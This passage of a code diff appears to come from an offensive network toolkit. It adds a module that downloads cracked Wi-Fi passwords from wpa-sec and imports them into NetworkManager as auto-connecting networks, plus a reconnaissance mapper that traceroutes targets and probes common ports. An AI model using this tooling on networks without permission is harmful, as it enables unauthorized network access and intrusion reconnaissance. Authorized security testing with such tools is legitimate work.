self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

319
actions/wpasec_potfiles.py Normal file
View File

@@ -0,0 +1,319 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
"Options: download (default if API key is set), clean, import, erase."
)
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"
b_args = {
"key": {
"type": "text",
"label": "API key (WPAsec)",
"placeholder": "wpa-sec api key",
"secret": True,
"help": "API key used to download the potfile. If empty, the saved key is reused."
},
"directory": {
"type": "text",
"label": "Potfiles directory",
"default": "/home/bjorn/Bjorn/data/input/potfiles",
"placeholder": "/path/to/potfiles",
"help": "Directory containing/receiving .pot / .potfile files."
},
"clean": {
"type": "checkbox",
"label": "Clean potfiles directory",
"default": False,
"help": "Delete all files in the potfiles directory."
},
"import_potfiles": {
"type": "checkbox",
"label": "Import potfiles into NetworkManager",
"default": False,
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
},
"erase": {
"type": "checkbox",
"label": "Erase Wi-Fi connections from potfiles",
"default": False,
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
}
}
b_examples = [
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]
def compute_dynamic_b_args(base: dict) -> dict:
"""
Enrich dynamic UI arguments:
- Pre-fill the API key if previously saved.
- Show info about the number of potfiles in the chosen directory.
"""
d = dict(base or {})
try:
settings_path = os.path.join(
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
)
if os.path.exists(settings_path):
with open(settings_path, "r", encoding="utf-8") as f:
saved = json.load(f)
saved_key = (saved or {}).get("api_key")
if saved_key and not d.get("key", {}).get("default"):
d.setdefault("key", {}).setdefault("default", saved_key)
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
except Exception:
pass
try:
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
exists = os.path.isdir(directory)
count = 0
if exists:
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
len(glob.glob(os.path.join(directory, "*.potfile")))
extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
except Exception:
pass
return d
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
def __init__(self, shared_data):
"""
Orchestrator always passes shared_data.
Even if unused here, we store it for compatibility.
"""
self.shared_data = shared_data
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
# --- Orchestrator entry point ---
def execute(self, ip=None, port=None, row=None, status_key=None):
"""
Entry point for orchestrator.
By default: download latest potfile if API key is available.
"""
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
self.shared_data.comment_params = {"ip": ip, "port": port}
api_key = self.load_api_key()
if api_key:
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
return "success"
else:
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
return "failed"
# --- API Key Handling ---
def save_api_key(self, api_key: str):
"""Save the API key locally."""
try:
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {"api_key": api_key}
with open(self.SETTINGS_FILE, "w") as file:
json.dump(settings, file)
logging.info(f"API key saved to {self.SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save API key: {e}")
def load_api_key(self):
"""Load the API key from local storage."""
if os.path.exists(self.SETTINGS_FILE):
try:
with open(self.SETTINGS_FILE, "r") as file:
settings = json.load(file)
return settings.get("api_key")
except Exception as e:
logging.error(f"Failed to load API key: {e}")
return None
# --- Actions ---
def download_potfile(self, save_dir, api_key):
"""Download the potfile from WPAsec."""
try:
cookies = {"key": api_key}
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
logging.info(f"Potfile saved to: {filename}")
except requests.exceptions.RequestException as e:
logging.error(f"Failed to download potfile: {e}")
except Exception as e:
logging.error(f"Unexpected error: {e}")
def clean_directory(self, directory):
"""Delete all potfiles in the given directory."""
try:
if os.path.exists(directory):
logging.info(f"Cleaning directory: {directory}")
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
os.remove(file_path)
logging.info(f"Deleted: {file_path}")
else:
logging.info(f"Directory does not exist: {directory}")
except Exception as e:
logging.error(f"Failed to clean directory {directory}: {e}")
def import_potfiles(self, directory):
"""Import potfiles into NetworkManager using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_added = []
DEFAULT_PRIORITY = 5
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, password = self._parse_potfile_line(line)
if not ssid or not password or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "add", "type", "wifi",
"con-name", ssid, "ifname", "*", "ssid", ssid,
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
"connection.autoconnect", "yes",
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_added.append(ssid)
logging.info(f"Imported network {ssid}")
except subprocess.CalledProcessError as e:
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
logging.info(f"Total imported: {networks_added}")
except Exception as e:
logging.error(f"Unexpected error while importing: {e}")
def erase_networks(self, directory):
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_removed = []
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, _ = self._parse_potfile_line(line)
if not ssid or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "delete", "id", ssid],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_removed.append(ssid)
logging.info(f"Deleted network {ssid}")
except subprocess.CalledProcessError as e:
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
logging.info(f"Total deleted: {networks_removed}")
except Exception as e:
logging.error(f"Unexpected error while erasing: {e}")
# --- Helpers ---
def _parse_potfile_line(self, line: str):
"""Parse a potfile line into (ssid, password)."""
ssid, password = None, None
if line.startswith("$WPAPSK$") and "#" in line:
try:
ssid_hash, password = line.split(":", 1)
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
except ValueError:
return None, None
elif len(line.split(":")) == 4:
try:
_, _, ssid, password = line.split(":")
except ValueError:
return None, None
return ssid, password
# --- CLI ---
def run(self, argv=None):
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
args = parser.parse_args(argv)
api_key = args.key
if api_key:
self.save_api_key(api_key)
else:
api_key = self.load_api_key()
if args.clean:
self.clean_directory(args.directory)
if args.import_potfiles:
self.import_potfiles(args.directory)
if args.erase:
self.erase_networks(args.directory)
if api_key and not args.clean and not args.import_potfiles and not args.erase:
self.download_potfile(args.directory, api_key)
if __name__ == "__main__":
WPAsecPotfileManager(shared_data=None).run()

847
actions/yggdrasil_mapper.py Normal file
View File

@@ -0,0 +1,847 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
the routing path to the target IP. Records hop IPs and RTT per hop.
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
optionally verifies a handful of key ports with TCP connect probes.
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
No matplotlib or networkx dependency -- pure JSON output.
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import os
import socket
import time
from datetime import datetime
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="yggdrasil_mapper.py", level=logging.DEBUG)
# Silence scapy logging before import
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy.interactive").setLevel(logging.ERROR)
logging.getLogger("scapy.loading").setLevel(logging.ERROR)
_SCAPY_AVAILABLE = False
try:
from scapy.all import IP, ICMP, sr1, conf as scapy_conf
scapy_conf.verb = 0
_SCAPY_AVAILABLE = True
except ImportError:
logger.warning("scapy not available; falling back to subprocess traceroute")
except Exception as exc:
logger.warning(f"scapy import error ({exc}); falling back to subprocess traceroute")
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_status = "yggdrasil_mapper"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 10
b_cooldown = 3600
b_rate_limit = "3/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 6
b_risk_level = "low"
b_enabled = 1
b_tags = ["topology", "network", "recon", "mapping"]
b_category = "recon"
b_name = "Yggdrasil Mapper"
b_description = (
"Network topology mapper that discovers routing paths via traceroute, enriches "
"nodes with service data from the DB, and saves a merged JSON topology graph. "
"Lightweight -- no matplotlib or networkx required."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "YggdrasilMapper.png"
b_args = {
"max_depth": {
"type": "slider",
"label": "Max trace depth (hops)",
"min": 5,
"max": 30,
"step": 1,
"default": 15,
"help": "Maximum number of hops for traceroute probes.",
},
"probe_timeout": {
"type": "slider",
"label": "Probe timeout (s)",
"min": 1,
"max": 5,
"step": 1,
"default": 2,
"help": "Timeout in seconds for each ICMP / TCP probe.",
},
}
b_examples = [
{"max_depth": 15, "probe_timeout": 2},
{"max_depth": 10, "probe_timeout": 1},
{"max_depth": 30, "probe_timeout": 3},
]
b_docs_url = "docs/actions/YggdrasilMapper.md"
# -------------------- Constants --------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
_VERIFY_PORTS = [22, 80, 443, 445, 3389, 8080]
# -------------------- Helpers --------------------
def _generate_mermaid_topology(topology: Dict[str, Any]) -> str:
"""Generate a Mermaid.js diagram string from topology data."""
lines = ["graph TD"]
# Define styles
lines.append(" classDef target fill:#f96,stroke:#333,stroke-width:2px;")
lines.append(" classDef router fill:#69f,stroke:#333,stroke-width:1px;")
lines.append(" classDef unknown fill:#ccc,stroke:#333,stroke-dasharray: 5 5;")
nodes = topology.get("nodes", {})
for node_id, node in nodes.items():
label = node.get("hostname") or node.get("ip")
node_type = node.get("type", "unknown")
# Sanitize label for Mermaid
safe_label = str(label).replace(" ", "_").replace(".", "_").replace("-", "_")
safe_id = node_id.replace(".", "_").replace("*", "unknown").replace("-", "_")
lines.append(f' {safe_id}["{label}"]')
if node_type == "target":
lines.append(f" class {safe_id} target")
elif node_type == "router":
lines.append(f" class {safe_id} router")
else:
lines.append(f" class {safe_id} unknown")
edges = topology.get("edges", [])
for edge in edges:
src = str(edge.get("source", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
dst = str(edge.get("target", "")).replace(".", "_").replace("*", "unknown").replace("-", "_")
if src and dst:
rtt = edge.get("rtt_ms", 0)
if rtt > 0:
lines.append(f" {src} -- {rtt}ms --> {dst}")
else:
lines.append(f" {src} --> {dst}")
return "\n".join(lines)
def _reverse_dns(ip: str) -> str:
"""Best-effort reverse DNS lookup. Returns hostname or empty string."""
try:
hostname, _, _ = socket.gethostbyaddr(ip)
return hostname or ""
except Exception:
return ""
def _tcp_probe(ip: str, port: int, timeout_s: float) -> Tuple[bool, int]:
"""
Quick TCP connect probe. Returns (is_open, rtt_ms).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
t0 = time.time()
try:
rc = s.connect_ex((ip, int(port)))
rtt_ms = int((time.time() - t0) * 1000)
return (rc == 0), rtt_ms
except Exception:
return False, 0
finally:
try:
s.close()
except Exception:
pass
def _scapy_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
ICMP traceroute using scapy. Returns list of hop dicts:
[{"hop": 1, "ip": "x.x.x.x", "rtt_ms": 12}, ...]
"""
hops: List[Dict[str, Any]] = []
for ttl in range(1, max_depth + 1):
pkt = IP(dst=target, ttl=ttl) / ICMP()
t0 = time.time()
reply = sr1(pkt, timeout=timeout_s, verbose=0)
rtt_ms = int((time.time() - t0) * 1000)
if reply is None:
hops.append({"hop": ttl, "ip": "*", "rtt_ms": 0})
continue
src = reply.src
hops.append({"hop": ttl, "ip": src, "rtt_ms": rtt_ms})
# Reached destination
if src == target:
break
return hops
def _subprocess_traceroute(target: str, max_depth: int, timeout_s: float) -> List[Dict[str, Any]]:
"""
Fallback traceroute using the system `traceroute` command.
Works on Linux / macOS. On Windows falls back to `tracert`.
"""
import subprocess
import re
hops: List[Dict[str, Any]] = []
# Decide command based on platform
if os.name == "nt":
cmd = ["tracert", "-d", "-h", str(max_depth), "-w", str(int(timeout_s * 1000)), target]
else:
cmd = ["traceroute", "-n", "-m", str(max_depth), "-w", str(int(timeout_s)), target]
try:
proc = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=max_depth * timeout_s + 30,
)
output = proc.stdout or ""
except FileNotFoundError:
logger.error("traceroute/tracert command not found on this system")
return hops
except subprocess.TimeoutExpired:
logger.warning(f"Subprocess traceroute to {target} timed out")
return hops
except Exception as exc:
logger.error(f"Subprocess traceroute error: {exc}")
return hops
# Parse output lines
ip_pattern = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
rtt_pattern = re.compile(r'(\d+(?:\.\d+)?)\s*ms')
hop_num = 0
for line in output.splitlines():
stripped = line.strip()
if not stripped:
continue
# Skip header lines
parts = stripped.split()
if not parts:
continue
# Try to extract hop number from first token
try:
hop_candidate = int(parts[0])
except (ValueError, IndexError):
continue
hop_num = hop_candidate
ip_match = ip_pattern.search(stripped)
rtt_match = rtt_pattern.search(stripped)
hop_ip = ip_match.group(1) if ip_match else "*"
hop_rtt = int(float(rtt_match.group(1))) if rtt_match else 0
hops.append({"hop": hop_num, "ip": hop_ip, "rtt_ms": hop_rtt})
# Stop if we reached the target
if hop_ip == target:
break
return hops
def _load_existing_topology(output_dir: str) -> Dict[str, Any]:
"""
Load the most recent aggregated topology JSON from output_dir.
Returns an empty topology skeleton if nothing exists yet.
"""
skeleton: Dict[str, Any] = {
"version": b_version,
"nodes": {},
"edges": [],
"metadata": {
"created": datetime.utcnow().isoformat() + "Z",
"updated": datetime.utcnow().isoformat() + "Z",
"run_count": 0,
},
}
if not os.path.isdir(output_dir):
return skeleton
# Find the latest aggregated file
candidates = []
try:
for fname in os.listdir(output_dir):
if fname.startswith("topology_aggregate") and fname.endswith(".json"):
fpath = os.path.join(output_dir, fname)
candidates.append((os.path.getmtime(fpath), fpath))
except Exception:
return skeleton
if not candidates:
return skeleton
candidates.sort(reverse=True)
latest_path = candidates[0][1]
try:
with open(latest_path, "r", encoding="utf-8") as fh:
data = json.load(fh)
if isinstance(data, dict) and "nodes" in data:
return data
except Exception as exc:
logger.warning(f"Failed to load existing topology ({latest_path}): {exc}")
return skeleton
def _merge_node(existing: Dict[str, Any], new: Dict[str, Any]) -> Dict[str, Any]:
"""Merge two node dicts, preferring newer / non-empty values."""
merged = dict(existing)
for key, val in new.items():
if val is None or val == "" or val == []:
continue
if key == "open_ports":
# Union of port lists
old_ports = set(merged.get("open_ports") or [])
old_ports.update(val if isinstance(val, list) else [])
merged["open_ports"] = sorted(old_ports)
elif key == "rtt_ms":
# Keep lowest non-zero RTT
old_rtt = merged.get("rtt_ms") or 0
new_rtt = val or 0
if old_rtt == 0:
merged["rtt_ms"] = new_rtt
elif new_rtt > 0:
merged["rtt_ms"] = min(old_rtt, new_rtt)
else:
merged[key] = val
merged["last_seen"] = datetime.utcnow().isoformat() + "Z"
return merged
def _edge_key(src: str, dst: str) -> str:
"""Canonical edge key (sorted to avoid duplicates)."""
a, b = sorted([src, dst])
return f"{a}--{b}"
# -------------------- Main Action Class --------------------
class YggdrasilMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
# ---- Phase 1: Traceroute ----
def _phase_traceroute(
self,
ip: str,
max_depth: int,
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> List[Dict[str, Any]]:
"""Run traceroute to target. Returns list of hop dicts."""
logger.info(f"Phase 1: Traceroute to {ip} (max_depth={max_depth})")
if _SCAPY_AVAILABLE:
hops = _scapy_traceroute(ip, max_depth, probe_timeout)
else:
hops = _subprocess_traceroute(ip, max_depth, probe_timeout)
# Progress: phase 1 is 0-30% (weight = 30% of total_steps)
phase1_steps = max(1, int(total_steps * 0.30))
progress.advance(phase1_steps)
logger.info(f"Traceroute to {ip}: {len(hops)} hop(s) discovered")
return hops
# ---- Phase 2: Service Enrichment ----
def _phase_enrich(
self,
ip: str,
mac: str,
row: Dict[str, Any],
probe_timeout: float,
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Enrich the target node with port / service data from the DB and
optional TCP connect probes.
"""
logger.info(f"Phase 2: Service enrichment for {ip}")
node_info: Dict[str, Any] = {
"ip": ip,
"mac": mac,
"hostname": "",
"open_ports": [],
"verified_ports": {},
"vendor": "",
}
# Read hostname
hostname = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
if not hostname:
hostname = _reverse_dns(ip)
node_info["hostname"] = hostname
# Query DB for known ports to prioritize probing
db_ports = []
try:
# mac is available in the scope
host_data = self.shared_data.db.get_host_by_mac(mac)
if host_data and host_data.get("ports"):
# Normalize ports from DB string
db_ports = [int(p) for p in str(host_data["ports"]).split(";") if p.strip().isdigit()]
except Exception as e:
logger.debug(f"Failed to query DB for host ports: {e}")
# Fallback to defaults if DB is empty
if not db_ports:
# Read existing ports from DB row (compatibility)
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
db_ports.append(int(p))
node_info["open_ports"] = sorted(set(db_ports))
# Vendor and OS guessing
vendor = str(row.get("Vendor") or row.get("vendor") or "").strip()
if not vendor and host_data:
vendor = host_data.get("vendor", "")
node_info["vendor"] = vendor
# Guess OS if missing (leveraging FeatureLogger patterns if we had access, but we'll do basic here)
# For now, we'll just store what we have.
# Verify a small set of key ports via TCP connect
verified: Dict[str, Dict[str, Any]] = {}
# Prioritize ports we found in DB + a few common ones
probe_candidates = sorted(set(db_ports + _VERIFY_PORTS))[:10]
for port in probe_candidates:
if self.shared_data.orchestrator_should_exit:
break
is_open, rtt = _tcp_probe(ip, port, probe_timeout)
if is_open:
verified[str(port)] = {"open": is_open, "rtt_ms": rtt}
# Update node_info open_ports if we found a new one
if port not in node_info["open_ports"]:
node_info["open_ports"].append(port)
node_info["open_ports"].sort()
node_info["verified_ports"] = verified
# Progress: phase 2 is 30-60%
phase2_steps = max(1, int(total_steps * 0.30))
progress.advance(phase2_steps)
self.shared_data.log_milestone(b_class, "Enrichment", f"Discovered {len(node_info['open_ports'])} ports for {ip}")
return node_info
# ---- Phase 3: Build Topology ----
def _phase_build_topology(
self,
ip: str,
hops: List[Dict[str, Any]],
target_node: Dict[str, Any],
progress: ProgressTracker,
total_steps: int,
) -> Tuple[Dict[str, Dict[str, Any]], List[Dict[str, Any]]]:
"""
Build nodes dict and edges list from traceroute hops and target enrichment.
"""
logger.info(f"Phase 3: Building topology graph for {ip}")
nodes: Dict[str, Dict[str, Any]] = {}
edges: List[Dict[str, Any]] = []
# Add target node
nodes[ip] = {
"ip": ip,
"type": "target",
"hostname": target_node.get("hostname", ""),
"mac": target_node.get("mac", ""),
"vendor": target_node.get("vendor", ""),
"open_ports": target_node.get("open_ports", []),
"verified_ports": target_node.get("verified_ports", {}),
"rtt_ms": 0,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
# Add hop nodes and edges
prev_ip: Optional[str] = None
for hop in hops:
hop_ip = hop.get("ip", "*")
hop_rtt = hop.get("rtt_ms", 0)
hop_num = hop.get("hop", 0)
if hop_ip == "*":
# Unknown hop -- still create a placeholder node
placeholder = f"*_hop{hop_num}"
nodes[placeholder] = {
"ip": placeholder,
"type": "unknown_hop",
"hostname": "",
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": 0,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": placeholder,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = placeholder
continue
# Real hop IP
if hop_ip not in nodes:
hop_hostname = _reverse_dns(hop_ip)
nodes[hop_ip] = {
"ip": hop_ip,
"type": "router" if hop_ip != ip else "target",
"hostname": hop_hostname,
"mac": "",
"vendor": "",
"open_ports": [],
"verified_ports": {},
"rtt_ms": hop_rtt,
"hop_number": hop_num,
"first_seen": datetime.utcnow().isoformat() + "Z",
"last_seen": datetime.utcnow().isoformat() + "Z",
}
else:
# Update RTT if this hop is lower
existing_rtt = nodes[hop_ip].get("rtt_ms") or 0
if existing_rtt == 0 or (hop_rtt > 0 and hop_rtt < existing_rtt):
nodes[hop_ip]["rtt_ms"] = hop_rtt
if prev_ip is not None:
edges.append({
"source": prev_ip,
"target": hop_ip,
"hop": hop_num,
"rtt_ms": hop_rtt,
"discovered": datetime.utcnow().isoformat() + "Z",
})
prev_ip = hop_ip
# Progress: phase 3 is 60-80% (weight = 20% of total_steps)
phase3_steps = max(1, int(total_steps * 0.20))
progress.advance(phase3_steps)
logger.info(f"Topology for {ip}: {len(nodes)} node(s), {len(edges)} edge(s)")
return nodes, edges
# ---- Phase 4: Aggregate ----
def _phase_aggregate(
self,
new_nodes: Dict[str, Dict[str, Any]],
new_edges: List[Dict[str, Any]],
progress: ProgressTracker,
total_steps: int,
) -> Dict[str, Any]:
"""
Merge new topology data with previous runs.
"""
logger.info("Phase 4: Aggregating topology data")
topology = _load_existing_topology(OUTPUT_DIR)
# Merge nodes
existing_nodes = topology.get("nodes") or {}
if not isinstance(existing_nodes, dict):
existing_nodes = {}
for node_id, node_data in new_nodes.items():
if node_id in existing_nodes:
existing_nodes[node_id] = _merge_node(existing_nodes[node_id], node_data)
else:
existing_nodes[node_id] = node_data
topology["nodes"] = existing_nodes
# Merge edges (deduplicate by canonical key)
existing_edges = topology.get("edges") or []
if not isinstance(existing_edges, list):
existing_edges = []
seen_keys: set = set()
merged_edges: List[Dict[str, Any]] = []
for edge in existing_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
for edge in new_edges:
ek = _edge_key(str(edge.get("source", "")), str(edge.get("target", "")))
if ek not in seen_keys:
seen_keys.add(ek)
merged_edges.append(edge)
topology["edges"] = merged_edges
# Update metadata
meta = topology.get("metadata") or {}
meta["updated"] = datetime.utcnow().isoformat() + "Z"
meta["run_count"] = int(meta.get("run_count") or 0) + 1
meta["node_count"] = len(existing_nodes)
meta["edge_count"] = len(merged_edges)
topology["metadata"] = meta
topology["version"] = b_version
# Progress: phase 4 is 80-95% (weight = 15% of total_steps)
phase4_steps = max(1, int(total_steps * 0.15))
progress.advance(phase4_steps)
logger.info(
f"Aggregated topology: {meta['node_count']} node(s), "
f"{meta['edge_count']} edge(s), run #{meta['run_count']}"
)
return topology
# ---- Phase 5: Save ----
def _phase_save(
self,
topology: Dict[str, Any],
ip: str,
progress: ProgressTracker,
total_steps: int,
) -> str:
"""
Save topology JSON to disk. Returns the file path written.
"""
logger.info("Phase 5: Saving topology data")
os.makedirs(OUTPUT_DIR, exist_ok=True)
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H-%M-%SZ")
# Per-target snapshot
snapshot_name = f"topology_{ip.replace('.', '_')}_{timestamp}.json"
snapshot_path = os.path.join(OUTPUT_DIR, snapshot_name)
# Aggregated file (single canonical file, overwritten each run)
aggregate_name = f"topology_aggregate_{timestamp}.json"
aggregate_path = os.path.join(OUTPUT_DIR, aggregate_name)
try:
with open(snapshot_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Snapshot saved: {snapshot_path}")
except Exception as exc:
logger.error(f"Failed to write snapshot {snapshot_path}: {exc}")
try:
with open(aggregate_path, "w", encoding="utf-8") as fh:
json.dump(topology, fh, indent=2, ensure_ascii=True, default=str)
logger.info(f"Aggregate saved: {aggregate_path}")
except Exception as exc:
logger.error(f"Failed to write aggregate {aggregate_path}: {exc}")
# Save Mermaid diagram
mermaid_path = os.path.join(OUTPUT_DIR, f"topology_{ip.replace('.', '_')}_{timestamp}.mermaid")
try:
mermaid_str = _generate_mermaid_topology(topology)
with open(mermaid_path, "w", encoding="utf-8") as fh:
fh.write(mermaid_str)
logger.info(f"Mermaid topology saved: {mermaid_path}")
except Exception as exc:
logger.error(f"Failed to write Mermaid topology: {exc}")
# Progress: phase 5 is 95-100% (weight = 5% of total_steps)
phase5_steps = max(1, int(total_steps * 0.05))
progress.advance(phase5_steps)
self.shared_data.log_milestone(b_class, "Save", f"Topology saved for {ip}")
return aggregate_path
# ---- Main execute ----
def execute(self, ip, port, row, status_key) -> str:
"""
Orchestrator entry point. Maps topology for a single target host.
Returns:
'success' -- topology data written successfully.
'failed' -- an error prevented meaningful output.
'interrupted' -- orchestrator requested early exit.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from DB row ---
mac = (
row.get("MAC Address")
or row.get("mac_address")
or row.get("mac")
or ""
).strip()
hostname = (
row.get("Hostname")
or row.get("hostname")
or row.get("hostnames")
or ""
).strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Configurable arguments ---
max_depth = int(getattr(self.shared_data, "yggdrasil_max_depth", 15))
probe_timeout = float(getattr(self.shared_data, "yggdrasil_probe_timeout", 2.0))
# Clamp to sane ranges
max_depth = max(5, min(max_depth, 30))
probe_timeout = max(1.0, min(probe_timeout, 5.0))
# --- UI status ---
self.shared_data.bjorn_orch_status = "yggdrasil_mapper"
self.shared_data.bjorn_status_text2 = f"{ip}"
self.shared_data.comment_params = {"ip": ip, "mac": mac, "phase": "init"}
# Total steps for progress (arbitrary units; phases will consume proportional slices)
total_steps = 100
progress = ProgressTracker(self.shared_data, total_steps)
try:
# ---- Phase 1: Traceroute (0-30%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.log_milestone(b_class, "Traceroute", f"Running trace to {ip}")
hops = self._phase_traceroute(ip, max_depth, probe_timeout, progress, total_steps)
# ---- Phase 2: Service Enrichment (30-60%) ----
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.comment_params = {"ip": ip, "phase": "enrich"}
target_node = self._phase_enrich(ip, mac, row, probe_timeout, progress, total_steps)
